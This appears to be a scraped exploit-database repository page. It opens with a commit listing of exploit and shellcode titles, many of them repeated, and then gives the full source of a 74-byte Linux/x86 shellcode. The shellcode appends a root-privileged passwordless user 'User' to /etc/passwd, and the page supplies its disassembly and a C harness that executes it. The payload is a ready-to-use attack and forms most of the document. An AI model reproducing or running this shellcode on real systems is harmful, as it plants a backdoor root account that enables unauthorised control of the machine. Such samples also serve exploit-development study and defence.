720fabd066
114 changes to exploits/shellcodes Notepad++ < 7.7 (x64) - Denial of Service winrar 5.80 64bit - Denial of Service WinRAR 5.80 (x64) - Denial of Service Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017) Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017) Microsoft Word 2007 (x86) - Information Disclosure IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Execution Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass) MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation MySQL User-Defined (Linux) (x86) - 'sys_exec' Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation Microsoft Windows (x86/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass) Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path DEWESoft X3 SP1 (64-bit) - Remote Command Execution DEWESoft X3 SP1 (x64) - Remote Command Execution CompleteFTP Professional 12.1.3 - Remote Code Execution TeamCity Agent XML-RPC 10.0 - Remote Code Execution eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes) Linux/x86 - Kill All Processes Shellcode (14 bytes) Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes) Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes) Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) Linux/x86 - Bind Shell Generator Shellcode (114 bytes) Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) Linux/x86 - Bind Shell Generator Shellcode (114 bytes) Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes) Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
61 lines
No EOL
1.8 KiB
C
61 lines
No EOL
1.8 KiB
C
# Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode (74 bytes)
|
|
# Date: 2019-10-12
|
|
# Author: bolonobolo
|
|
# Vendor Homepage: None
|
|
# Software Link: None
|
|
# Tested on: Linux x86
|
|
# Comments: add user "User" to /etc/passwd
|
|
# CVE: N/A
|
|
|
|
/*
|
|
00000000 31DB xor ebx,ebx
|
|
00000002 31C9 xor ecx,ecx
|
|
00000004 66B90104 mov cx,0x401
|
|
00000008 F7E3 mul ebx
|
|
0000000A 53 push ebx
|
|
0000000B 6873737764 push dword 0x64777373
|
|
00000010 68632F7061 push dword 0x61702f63
|
|
00000015 682F2F6574 push dword 0x74652f2f
|
|
0000001A 8D1C24 lea ebx,[esp]
|
|
0000001D B005 mov al,0x5
|
|
0000001F CD80 int 0x80
|
|
00000021 93 xchg eax,ebx
|
|
00000022 F7E2 mul edx
|
|
00000024 686E2F7368 push dword 0x68732f6e
|
|
00000029 683A2F6269 push dword 0x69622f3a
|
|
0000002E 68303A3A2F push dword 0x2f3a3a30
|
|
00000033 683A3A303A push dword 0x3a303a3a
|
|
00000038 6855736572 push dword 0x72657355
|
|
0000003D 8D0C24 lea ecx,[esp]
|
|
00000040 B214 mov dl,0x14
|
|
00000042 B004 mov al,0x4
|
|
00000044 CD80 int 0x80
|
|
00000046 2C13 sub al,0x13
|
|
00000048 CD80 int 0x80
|
|
|
|
|
|
|
|
*/
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char code[] = \
|
|
"\x31\xdb\x31\xc9\x66\xb9\x01\x04\xf7\xe3\x53"
|
|
"\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68"
|
|
"\x2f\x2f\x65\x74\x8d\x1c\x24\xb0\x05\xcd\x80"
|
|
"\x93\xf7\xe2\x68\x6e\x2f\x73\x68\x68\x3a\x2f"
|
|
"\x62\x69\x68\x30\x3a\x3a\x2f\x68\x3a\x3a\x30"
|
|
"\x3a\x68\x55\x73\x65\x72\x8d\x0c\x24\xb2\x14"
|
|
"\xb0\x04\xcd\x80\x2c\x13\xcd\x80";
|
|
|
|
void main()
|
|
{
|
|
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
|
|
int (*ret)() = (int(*)())code;
|
|
|
|
ret();
|
|
|
|
} |